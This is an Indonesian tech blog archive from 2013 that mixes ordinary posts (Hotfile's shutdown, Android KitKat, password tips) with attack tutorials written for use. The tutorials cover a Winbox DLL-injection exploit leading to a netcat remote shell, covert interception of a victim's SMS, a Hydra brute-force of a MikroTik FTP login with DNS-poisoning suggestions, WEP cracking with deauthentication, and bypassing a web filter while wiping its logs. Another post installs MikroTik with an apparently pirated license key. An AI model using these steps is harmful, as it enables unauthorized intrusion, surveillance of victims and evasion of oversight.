8 Des 2013

Situs File sharing Hotfile Resmi Ditutup Karena Melanggar Hak Cipta


Situs File sharing Hotfile Resmi Ditutup

Hotfile | Bagi anda yang suka download atau menyimpan banyak file di website file-sharing Hotfile harus berbesar hati pasalnya situs tersebut kini telah dimatikan atau ditutup, menyusul putusan Pengadilan Federal Amerika Serikat karena dianggap melanggar hak cipta.

Sebelumnya Motion Picture Association of America (MPAA) telah menuntut ganti rugi sebesar 80 juta dolar atau sekitar 958 milyar rupiah.  Setelah melalui proses yang panjang dan lama di pengadilan yang dimulai sejak 3 tahun lalu akhirnya Hotfile telah setuju untuk membayar ganti rugi tersebut.

Penutupan ini mengingatkan kita pada situs MegaUpload yang ditutup beberapa tahun lalu karena kasus yang sama. Hal ini disebabkan karena banyaknya studio film Hollywood yang mengajukan tuntutan kepada website file-sharing besar terkait film bajakan.

Screenshot Hotfile sebelum ditutup :

Situs File sharing Hotfile Resmi Ditutup

Screenshot Hotfile setelah ditutup :

Situs File sharing Hotfile Resmi Ditutup

Akibat penutupan ini banyak pihak yang kehilangan file ynag tidak terkait pembajakan, belum diketahui pasti apakah file yang disimpan di situs tersebut dapat di ambil kembali atau tidak, bahkan kabarnya pendapatan para affiliate Hotfile juga tidak dibayarkan.

Sumber http://www.theverge.com

9 Nov 2013

Winbox Mikrotik Remote Exploit Vulnerability


Remote Exploit vulnerability adalah sebuah celah keamanan yang memungkinkan attacker/hacker untuk mendapatkan akses remote ke dalam system komputer.

Untuk lebih jelasnya mengenai Remote Exploit baca di thred ini
http://indefinitech.com/forum/Thread-apa...ploit.html
Winbox? Winbox adalah aplikasi client mikrotik yang fungsinya untuk mengontrol mikrotik router.

Exploit ini ditemukan oleh "PoURaN" dari 133tsec yang mana exploit ini akan menunggu koneksi pada port 8291(Port default Winbox) dan mengirinkan dll file dan menbuka port 4444 pada komputer client yang menggunakan aplikasi winbox.

Pada saat aplikasi melakukan koneksi pada port 8291 maka komputer kita yang telah disetting sebagai fake mkrotik router akan mengirimkan file dll yang akan menjadikan komputer klien memberikan akses Remote kedalam systemnya.

-Download exploit
- Extract data yang di kompresi dalam zip
- Masuk ke direktori dimana anda meng-extract exploit yang barusan and download
- Saya asumsikan bahwa jika anda menggunakan sistem operasi Windows sudah terinstall Python. Namun jika belum silahkan download python disini http://www.python.org/
- Jika anda menggunakan sistem operasi linux bawaanya sudah terinstall Python


##Jalankan Exploit
-python mtikInject.py

[Image: image.jpg]

-Pada screenshot diatas saya memasukan ppp.dll.bind.gz maka isikan juga ppp.dll.bind.gz pada sesi dialog kemudian enter

Maka akan tampil seperti pada gambar screenshot dibawah ini

[Image: image.jpg]

-Kemudian pergi ke komputer lainnya dan buka aplikasi winbox serta masukan IP komputer yang telah anda siapkan tadi, contohnya :

[Image: image.jpg]

IP 10.10.2.5 adalah IP komputer yang saya jalankan exploit mtikInject.py

- Jika sudah disi IP-nya. Saatnya pada jendela Winbox klik "Connect"

Setelah anda meng-klik "Connect"

[Image: image.jpg]

[Image: image.jpg]

- Download netcat jika belum punya disini
Netcat akan kita pagai untuk mengakses port yang terbuka pada komputer yang menggunakan aplikasi winbox ini dan disinilah hasil "Remote Exploit".

##Syntax Netcat untuk melakukan Remote

nc.exe [ip] [port]

Untuk lebih jelasnya perhatikan screenshot berikut:

[Image: image.jpg]

Kita lihat pada gambar diatas bahwa kita menjalankan Netcat untuk melakukan remote pada IP 192.168.64.130 dan pada port 4444

Hasilnya kita berhasil masuk kedalam sistem komputer korban dan kita pada berada pada direktori "C:\Users\Lab 7\AppData\Roaming\Mikrotik\Winbox\5.14-2196053920>"



Thanks

Possibly Related Threads...
Intrasrv 1.0 Buffer Overflow
MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)
ABBS Audio Media Player .LST Buffer Overflow 
source:http://indefinitech.com/forum/Thread-winbox-mikrotik-remote-exploit-vulnerability.html 

19 Okt 2013

10 Fitur Menakjubkan Dari Android Kitkat


Android baru saja mengumumkan versi terbarunya yakni versi 4.4 yang di beri nama Android Kitkat. Nama Kitkat sendiri diambil dari salah satu produk Nestle. Sistem operasi ini dikabarkan memiliki fitur-fitur yang lebih baik dan lebih unggul dibandingkan sistem operasi Android sebelumnya. 

Salah satu perangkat yang sudah menggunakan Android Kitkat adalah smartphone Google Nexus 5. Perangkat ini akan segera dipasarkan beberapa hari ke depan dengan harga 3,9 jutaan. Sebelum perangkat ini dijual ke pasaran mari kita lihat fitur-fitur yang ada di Android Kitkat. Berikut 10 Fitur Menakjubkan Pada Android Kitkat


  1. SMS Terintegrasi Dengan Hangouts. Bayangkan ketika SMS dan MMS Anda terintegrasi ke dalam aplikasi Google Hangouts. Anda bisa berkirim pesan SMS, MMS, instant messaging bisa dilakukan melalui Android Kitkat. 
  2. Navigasi dan Status Bar. Bar pemberitahuan yang mengalami banyak perubahan di Android Kitkat. Kalau sebelumnya latar belakangnya berwarna hitam kini dengan Android baru menjadi transparan dan ikon seperti baterai, kekuatan sinyal dan lain-lain akan menjadi putih. Sama halnya dengan bar navigation, di mana Home, Back dan App Swicher tetap ada. 
  3. Antarmuka Lebih Halus. Pengguna Android selalu mengeluh tentang Android yang boros memori. Namun Android 4.4 yang berdasarkan pada Linux 3.8 baru berbasis kernel yang dikabarkan membantu konsumsi RAM yang lebih rendah, walaupun perangkat ini berjalan dengan RAM 512MB sekali pun. Android 4.4 jauh lebih ringan dan lebih cepat daripada Android versi 4.3 atau sebelumnya. 
  4. Desain ikon yang unik. Android terbaru telah membawa perubahan dalam desain ikon aplikasi seperti YouTube, Pengaturan, Pengaturan Google, Google Voice Search dan and Settings. Selain itu ada beberapa perubahan dalam tampilan jam, stopwatch dan aplikasi timer, dan bagian download baru untuk aplikasi dan game. 
  5. Selalu Mendengarkan. Android KitKat kemungkinan datang dengan kemampuan homepage berbasis "Google Now", yang berarti platform ini akan mendukung ponsel yang dapat "mendengarkan" untuk perintah suara tanpa menguras daya baterai. Saat ini, kemampuan untuk perintah suara terbatas pada tombol speaker di widget Google Search dan dalam aplikasi Google Search itu sendiri. 
  6. Cloud Printing. Perangkat Android sekarang akan memiliki kemampuan untuk mencetak secara nirkabel dengan Cloud Printing, sebuah layanan yang diluncurkan pada bulan Juni tahun ini. Dengan aplikasi ini pengguna Android Kitkat bisa mengirim perintah untuk mencetak dokumen dari tablet, Smartphone mereka melalui laptop ke printer yang terhubung, idealnya untuk Microsoft Office. 
  7. Ikon Kamera Di Layar Terkunci. Dengan Android 4.3, Anda dapat mengakses aplikasi kamera dari layar terkunci dengan menggesekkan ke kanan, namun dalam baru 4.4, memiliki opsi yang tetap sama, tetapi ada ikon kamera di sudut kanan bawah untuk memudahkan akses, mirip dengan iOS 7. 
  8. QuickOffice Terintegrasi. Aplikasi QuickOffice dimuat di dalam Android KitKat, aplikasi produktivitas yang dibeli Google baru-baru ini, memungkinkan anda untuk lebih mudah mengedit file di Microsoft Office. Namun aplikasi ini sudah tersedia secara gratis di keduanya yakni Android dan iOS. 
  9. Tema Holo. Anda mungkin menyukai tema dengan Holo biru abu-abu pada versi Android sebelumnya, tema yang ada di perangkat Android ternyata digunakan untuk ikon baterai dan Wi-Fi menjadi biru ketika dalam kondisi kesehatan yang baik. 
  10. Dialer Baru. Dialer baru pada perangkat Android 4.3 menggunakan angka berwarna biru dan latar belakang warna hitam. Kini di perangkat Android terbaru memiliki latar belakang berwarna putih, biru dan angka batas biru. Hal ini selaras dengan desain terbaru Google.

18 Okt 2013

Membuat Folder Baru dengan keyboard Di Windows Explorer


blogbudaqdegil.blogspot Cara Cepat Membuat Folder Baru Di Windows Explorer
Biasanya kita membuat folder baru di windows explorer dengan cara konvensional yaitu mengklik kanan mouse   kemudian ke New -> Folder.
Jika anda sering menambahkan folder baru kedalam harddisk anda, lama-kelamaan cara ini memang terasa menjengkelkan.

Tapi ada cara yang cukup praktis untuk membuat folder baru dengan menggunakan cara pintas (Keyboard Shortcut)
Coba saja simak tip Cara Cepat Membuat Folder Baru Di Windows Explorer dibawah ini, semoga ada gunanya.

Tahan tombol Alt + F, kemudian dengan tidak melepaskan tombol Alt, tekan lagi W
-> F, maka akan tampil folder baru dan silahkan isi namanya .
 
Langkah di atas bekerja untuk Windows XP, Vista dan Windows 7. Tetapi fitur pada Windows 7 mempunyai lebih banyak shortcut yang sangat user friendly. Pada Windows 7 cara membuat shortcut diatas cukup dengan menekan Ctrl + Shift + N untuk membuat folder baru secara langsung
 
source:
http://blogbudaqdegil.blogspot.com/2011/11/cara-cepat-membuat-folder-baru-di.html

11 Okt 2013

Tips membuat kata sandi yang kuat dan aman

Kata sandi yang aman adalah lini pertahanan pertama Anda melawan penyusup dan penipu.
Jangan pernah memberikan kata sandi Anda kepada siapa pun. Jangan pernah berikan kepada teman, yang paling baik sekalipun. Teman dapat memberitahukan kata sandi Anda kepada orang lain tanpa sengaja, atau menjadi bekas teman bagi Anda dan menyalahgunakan kata sandi itu.
Jangan hanya menggunakan satu kata sandi untuk beberapa situs web. Jika seseorang menemukan kata sandi tunggal itu, mereka dapat menggunakannya untuk membobol account Anda di situs lain.
Buatlah kata sandi yang mudah diingat namun susah ditebak oleh orang lain. Pikirkan frasa seperti “Aku selesai kuliah tahun 2004” dan gunakan huruf depan dari setiap kata ini menjadi: “Askt2004.”
Buatlah kata sandi dengan panjang sedikitnya 8 karakter. Semakin panjang, semakin baik. Kata sandi yang panjang lebih sulit dipecahkan oleh pencuri.
Gunakan nomor, huruf besar, dan simbol. Jika situs webnya memungkinkan, gunakan $ sebagai pengganti S atau 1 sebagai pengganti L atau gunakan & atau ! – namun ingat bahwa $1ngle BUKAN kata sandi yang bagus. Pencuri kata sandi akan memecahkannya. Namun t$sa0 (singkatan dari “temanku Sam sangat asyik orangnya”) dapat menjadi kata sandi yang bagus.
Pertimbangkan menggunakan pengelola kata sandi. Ada beberapa program atau layanan Web yang memungkinkan Anda membuat kata sandi yang kuat dan berbeda untuk setiap situs. Anda hanya perlu mengingat satu kata sandi untuk mengakses program itu atau situs aman yang menyimpan kata sandi Anda. Dua di antara program ini adalah RoboForm (khusus Windows) dan Lastpass (Windows dan Mac).
Jangan tertipu serangan "phishing". Hati-hati sebelum mengklik link apa pun yang meminta Anda untuk login, mengubah kata sandi, atau memberikan data pribadi, meskipun permintaan itu tampaknya berasal dari situs yang sah. Bisa jadi permintaan itu adalah "phishing" dan informasi yang Anda berikan akan masuk ke peretas (hacker). Apabila ragu-ragu, login-lah secara manual dengan mengetikkan URL yang Anda tahu untuk situs itu di jendela browser.
Pastikan komputer Anda aman. Kata sandi terbaik di dunia tidak akan berguna jika seseorang mengintip dari balik pundak saat Anda mengetik (di kehidupan nyata maupun secara maya) atau jika Anda lupa logout dari komputer yang dipakai bersama. Perangkat lunak jahat, termasuk “keyboard logger” yang merekam semua ketukan tombol, dapat mencuri kata sandi dan informasi lainnya. Untuk meningkatkan keamanan, pastikan Anda menggunakan perangkat lunak antivirus dan sistem operasi yang mutakhir.
Pertimbangkan juga “kata sandi” untuk ponsel Anda. Banyak ponsel dapat dikunci sehingga satu-satunya cara menggunakannya adalah dengan mengetikkan kode tertentu. Orang dapat menemukan atau mencuri ponsel yang tidak terkunci dan menggunakannya untuk mencuri data pribadi, melakukan panggilan, atau mengirim sms yang seolah-olah berasal dari Anda. Pengguna ponsel Anda dapat mengirim sms yang seolah-olah Anda melecehkan kontak di buku alamat Anda dengan gambar atau perkataan yang tidak pantas.
© ConnectSafely.org

3 Okt 2013

Cara Sadap/Hack SMS Menggunakan Operator XL

hack hp, hack sms, hacking, cara hack sms
Setelah sebelum nya Info PC posting artikel tentang Cara Hack Handphone menggunakan aplikasi, maka kali ini Info PC akan menulis tentang Cara Hack SMS atau lebih tepatnya Cara Sadap/Hack SMS Menggunakan Operator dari HP orang lain tanpa sepengetahuan si korban.
Bagaimana cara nya??
Untuk cara kali ini kita memerlukan bantuan dari salah satu operator seluler yang ada di indonesia, yaitu Operator XL dengan tarif Rp. 1.000,-/bulan.
Oke, langsung saja ikuti caranya.
Simak!!
  1. Pertama-tama kamu harus pinjam hp korban (jika tidak di kasih rayu saja pake Magnum).
  2. Kemudian kamu ketik kode berikut dari Hp nya *123*571# kemudian Call.
  3. Setelah keluar menu nya, kamu pilih menu nomor 1 yaitu Auto Copy
  4. Kemudian kamu kirim SMS dari HP korban dengan Format COPY ON kemudian kirim ke nomor Handphone kamu, dan proses penyadapan pun berhasil.
  5. Silakan menikmati setiap SMS dari orang-orang yang kirim pesan kepada korban.
source :
http://infopc-yogi.blogspot.com/2012/10/cara-hack-sms-handphone-orang-lain.html

20 Sep 2013

Hacking Mikrotik Password dengan Inti kelemahan

are
http://blog.xcode.or.id/wp-content/uploads/2011/11/hackmikrotik.jpgTidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.
Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata bisa. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi? :)
Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.
Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik
C:\Documents and Settings\serverdata>nmap -A 192.168.1.174
Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time
Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        MikroTik router ftpd 3.20
22/tcp   open  ssh        OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp   open  telnet     Linux telnetd
80/tcp   open  http       MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open  winbox     MikroTik WinBox management console
8080/tcp open  http-proxy Mikrotik http proxy
8291/tcp open  unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
HOP RTT     ADDRESS
1   0.13 ms 192.168.1.174
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
Ternyata banyak port dan service yang terbuka di mikrotik. :D
Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.
C:\Documents and Settings\serverdata>

Anda bisa menggunakan tool Hydra GUI buatan Yogyafree disini
C:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174   login: admin   password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Saat login dan exploitasi yang dapat dilakukan.
Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router. :D
Ingin dapat bandwidth full ? :D
Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.

Oke, sekian dulu, cayooo.
Oleh Kurniawan – yk_family_code@yahoo.com
 sumber:
http://blog.xcode.or.id/?p=661

17 Sep 2013

Hack Wifi dengan Aircrack

http://www.mmbarabba.it/kwuppi/wp-content/uploads/2009/09/schermata-aircrack.png 
Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card
$ sudo airmon-ng stop ath0
kemudian masukkan
$ iwconfig
Sistem harus merespon sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏
Step 2 : Start wireless card
$ airmon-ng start wifi0
“9″ adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet
respon sistem harus sebagai berikut:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏
kemudian masukkan
$ iwconfig
dan pastikan bahwa resppon sistem sebagai berikut
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step 3 : Jalankan airodump-ng
airodump-ng digunakan untuk mengcapture paket dari akses point
$ sudo airodump-ng –channel X –write prefix_for_capture_file interface
misal
$ sudo airodump-ng –channel 3 –write tes ath0
“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.
untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas
$ airodump-ng –write tes ath0
Step 4 : Deauthenticate Clients(optional)
tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.
$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang
misal
$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
* -a BSSID/Mac address akses point
* -c MAC Address client
* 15 jumlah paket yang dikirim
Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.
$ sudo aircrack-ptw tes-01.cap
atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng
$ sudo aircrack-ng -z tes-01.cap -b mac_ssid
misal
$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx
contoh output :
i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.
Aircrack-ng 1.0 beta1
[00:00:00] Tested 81 keys (got 21872 IVs)
KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)
KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU
Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0″ tetapi
$ sudo airmon-ng start wlan0
untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU
pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1″ tetapi
$ airmon-ng start eth1
Selamat mencoba
Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”
Sumber : https://www.facebook.com/notes/kumpulan-teknik-informatika-univ-serambi-mekkah/aircrack-ng/193159214070190?ref=nf

Cara Mengganti Nama Facebook Terbaru


saya mau tanya nie,pernah gak kalian punya keinginan untuk mengganti nama Facebook kalian yang sudah lama di pakai ?
pastinya BOSEN kan pakai nama yang itu" melulu ?
nah saya akan kasih cara agar bisa ganti Nama Facebook lagi :)

caranya cukup mudah kok :)
Kalian haris ke Alamat yang ada  DISINI atau mau Klik yang DISINI


us kalian isi semua kolomnya dan upload Foto Asli Kalian yang pernah jadi foto profil
liat gambar di bawah :



sumber :
http://bandung-cyber4rt.blogspot.com/2012/07/cara-mengganti-nama-facebook-terbaru.html

Cara Menembus Proteksi Web

Saat ini banyak perusahaan, sekolahan, kampus maupun instansi lain yang meggunakan software K9 Web Protection untuk memfilter koneksi internetnya, ya tujuannya satu biar produktivitas kerja mereka meningkat, tapi tenang aja Jika anda adalah golongan orang seperti itu dan perusahaan atau tempat anda beraktifitas memfilter website-website yang menjadi sumber inspirasi anda.anda dapat menggunakan software berikut untuk mem-bypass Proteksi K9 Web versi 3 hingga 4.0.288.
Nah Untuk Softwarenya Bisa di download Disini
bypass web filter picture
Nah langkah selanjutnya extrax file tsb dengan winRaR ==>> Install.
dan ikuti langkah- langkah berikut :
  1. Tutup semua browser yang terbuka. (PENTING, agar aplikasi ini bisa memanipulasi LOG)
  2. Jalankan Bypass K9 Web Protection v1.2 lalu klik saja ”Unblock All Website”, akan keluar pesan pemberitahuan bahwa semua web yang di blokir bisa diakses kembali dengan normal. Bypass K9 Web Protection v1.2 bisa Anda tutup sekarang.
  3. Browsing Sepuasnya tanpa dibatasi oleh filter K9. trus klo uda puas browsing.
  4. Tutup semua browser yang terbuka (sama dengan langkah pertama)
  5. Jalankan Bypass K9 Web Protection v1.2 lalu klik ”Restore Admin. Settings”, akan keluar pesan pemberitahuan bahwa kini Administrator setting sudah dikembalikan dalam keadaan seperti sedia kala, termasuk LOG pada K9 WP tentang situs-situs yang Anda buka juga sudah dihapus.
(Untuk dapat menggunakan software ini, pastikan anda masuk sebagai administrator window yang anda gunakan, bukan sebagai guest atau user lain yang hak aksesnya dibawah administrator)

sumber:
http://kapanmaju.blogspot.com/2010/01/di-kantor-online-pakai-proxy-walau.html

14 Sep 2013

Cara Membuat Efek Zoom Pada Gambar Di Blog




  • Login ke akun blogger sobat.
  • Pilih Template
  • Untuk berjaga jaga downlod dulu tamplate blog sobat ( Backup )
  • Pilih Edit HTML >> Lanjutkan >> Kasih centang "Expand Template Widget".
  • Cari kode ]]></b:skin> untuk mempermudah gunakan F3 atau Ctrl F.
  • Letakan kode di bawah ini tepat di atas kode ]]></b:skin>

.post img:hover {
-o-transition: all 0.3s;
-moz-transition: all 0.3s;
-webkit-transition: all 0.3s;
-moz-transform: scale(1.3);
-o-transform: scale(1.3);
-webkit-transform: scale(1.3); }


  • Simpan dan lihat hasilnya.
sumber:
http://luhurfatah10.blogspot.com/2012/11/cara-membuat-efek-zoom-pada-gambar-di.html

konfigurasi firewall pada jaringan

Konfigurasi Basic (dasar)

Sebenarnya ada banyak cara untuk mengakses konfigurasi firewall, bisa menggunakan Pix Device Manager (PDM), ataupun hanya menggunakan comand prompt. Kita pilih yang menggunakan comand prompt, karena kita ingin belajar bagaimana mengkonfigurasi sendiri dan tidak melalui interface (alasan, padahal karena saya tidak pernah menggunakan PDM, hehe).
Didalam kotak pembelian Pix Firewall tersebut ada kabel serial dan sambungkan ke PC. Lalu buka comand prompt, dan lakukan telnet ke IP Firewall anda (default IP biasanya 192.168.1.1)
telnet 192.168.1.1
setelah itu akan keluar prompt untuk mengisikan password, isikan dengan ‘cisco’ (default passwordnya). Setelah itu, anda harus masuk ke kondisi enable (en).

Nah, sekarang kita telah berada di mod administratif. Setelah itu mari kita melakukan basic konfigurasi, yang terdiri dari:
1.     Kita set hostname dari firewall
2.     Kita ubah password untuk firewall dan fungsi enable
3.     Kita konfigurasi IP pada interface
4.     Membuat rute default
1. Set hostname
2. Kita tukar password untuk login
Kita tukar password enable, untuk ke mod administratif
3. Kita konfigurasi IP address outside dan inside dari firewall ini
62.6.63.178 akan menjadi IP dari firewall untuk koneksi ke luar, dan 192.168.3.1 akan menjadi IP untuk komunikasi secara internal dengan device-device lain dalam jaringan kita.
4. Kemudian kita buat default route, sehingga semua komunikasi ke firewall akan diteruskan ke router (kita anggap router kita mempunyai IP 62.6.63.177)
Network Address Translation (NAT)
Ok, konfigurasi secara basic telah kita lakukan, sekarang kita ke konfigurasi yang lebih lanjut sedikit (little bit advance, hehe) . Yaitu Network address translation
Peraturan Firewall
Peraturan firewall (firewall rules) mempunyai maksud untuk memberikan izin devices dari dalam ataupun luar untuk mengakses ke luar atau ke dalam (hehehe bingung saya, network in-out / network out-in begitu kurang lebih).
Jadi dengan command di atas, maka akses ke internet (www) adalah boleh, demikian juga mail server (IP 62.6.63.180) dapat menerima dan menghantar email. * ada pesan dari orang katanya jangan pakai conduit, karena itu konfigurasi yang lama (lemah), lebih baik pakai access list (ketika server kami kena serang, dan dia diberikan konfigurasinya)
Terakhir kita show dan save
untuk melihat semua konfigurasi yang telah kita buat
Untuk save konfigurasi dalam flash memory, kalau tidak maka akan hilang ketika firewall mati (restart)
Catatan : Semua IP diatas adalah fiktif, jangan mencoba-coba untuk mengakses. Konfigurasi penuh Firewall kami sendiri pada waktu itu mencapai 3 lembar kertas A4 (kalau diprint), yang disini hanyalah dasar.
PIX#exit
*Selesai*

sumber:
http://rumah-it01.blogspot.com/2013/05/konfigurasi-firewall.html

Tutorial Setting Mikrotik

Mikrotik cukup handal digunakan sebagai server, saat ini sudah banyak yang menggunakannya, baik warnet yang bertipe SOHO hingga ISP sampai skala besar dengan client yang banyak. baik mikrotik type Routerboard yang dipasarkan oleh pabrikan maupun Router OS berbentuk PC masing - masing mempunyai kelebihan dan kekurangan, tapi bagi saya, mikrotik PC tetap lebih menjanjikan karena frekwensinya dapat diupgrade sekehendak hati tergantung kesanggupan anda membeli hardware komputernya, hingga penggunaan cache dengan memberdayakan Hardisk dengan kapasitas besar sebagai proxi internal. dari sisi PC, saya cenderung menggunakan DOM Hardisk untuk dijadikan engine dengan menginstal mikrotik ke dalamnya serta menggandengnya dengan hardisk SATA sebagai cache proxi, ketimbang menggunakan hardisk tunggal yang engine dan cache tergabung jadi satu didalamnya. DOM hardisk sendiri terasa lebih aman sebagai engine mengingat biasanya PC mikrotik dihidupkan secara terus menerus, hardisk biasa menggunakan cakram sebagai media read/write sehingga rawan over heating akibat gesekan yang terus menerus, seandainya anda tetap menggunakan hardisk, saya sarankan untuk memasang kipas tambahan dibagian dalam PC untuk menyedot panas berlebih hingga sirkulasi panas terjaga dan suhu tetap stabil.


Menginstal Mikrotik ke PC
Bagi yg mau menginstal mikrotik ke PC/Komputer untuk dijadikan router, saya akan berikan tehniknya, mikrotik disini saya bagi dalam 2 versi, untuk Pentium 3 kebawah saya anjurkan menggunakan versi 3.30 agar tidak terlalu berat, dan versi 5.18 untuk Pentium 4, tapi tergantung anda mau makek yg mana atau lebih familiar yang mana, yang penting keduanya udah license level 6 hingga user yg bisa ditangani tidak terbatas alias unlimited, perhatikan tahapan sebagai berikut:

MIKROTIK OS v3.30 License Level 6 
  1. Download file MikroTik Routers and Wireless
  2. Setelah selesai, extract menggunakan winrar 
  3. Didalamnya terdapat beberapa file antara lain file mikrotik, file gentoo, tutorial dan key license, cari file dengan extensi ISO, yaitu Mikrotik Iso files dan Gentoo Iso files, silahkan burn keduanya ke 2 CD yang berbeda, dan ingat bahwa file key yaitu HU6I-XPT.key nanti digunakan untuk meregister mikrotik. 
  4. Tahap pertama, Masukan CD Mikrotik yang sudah di burn td, Install MikroTik 3.30 terkecuali mpls-test, routing-test, dan xen dan tekan "i" untuk melanjutkan "yes" dan "yes", instal sampai selesai. lalu restart komputer, keluarkan CD mikrotik. 
  5. Masukkan CD Gentoo, Booting komputer dengan linux livecd-gentoo.
  6. Matikan komputer.
  7. Hidupkan komputer dan booting MikroTik (isikan ip address pada mikrotik untuk remote). 
  8. Buka Winbox dan remote ke mikrotik, System -> license -> Import key -> pilih file HU6I-XPT.key yang ada di folder extract-kan file pertama yang anda download tadi dan kemudian restart Mikrotik 
  9. Akhirnya MikroTik versi 3.30 selesai. (lihat system->license) 

MIKROTIK OS v5.18 License Level 6 

  1. Download filenya mikrotik 5.20 atau mikrotik 5.18
  2. Extract lalu burn file yang berekstensi .ISO ke CD 
  3. Boot Komputer dengan CD mikrotik iso hasil burn td 
  4. Instal mikrotik dengan mencentang semua pilihan menggunakan tombol spasi, untuk melanjutkan proses instal, klik huruf "i" lalu "yes" dan "yes" jika selesai, komputer akan meminta reboot dengan menekan enter, keluarkan CD mikrotik. 
  5. Buka winbox, scan dan masuk menggunakan alamat IP Mikrotik atau jika ip nya 0.0.0.0 dan tidak bisa masuk, maka cobalah masuk dengan alamat Mac address-nya. 
  6. booting mikrotik, username : admin, password: <kosongkan> 
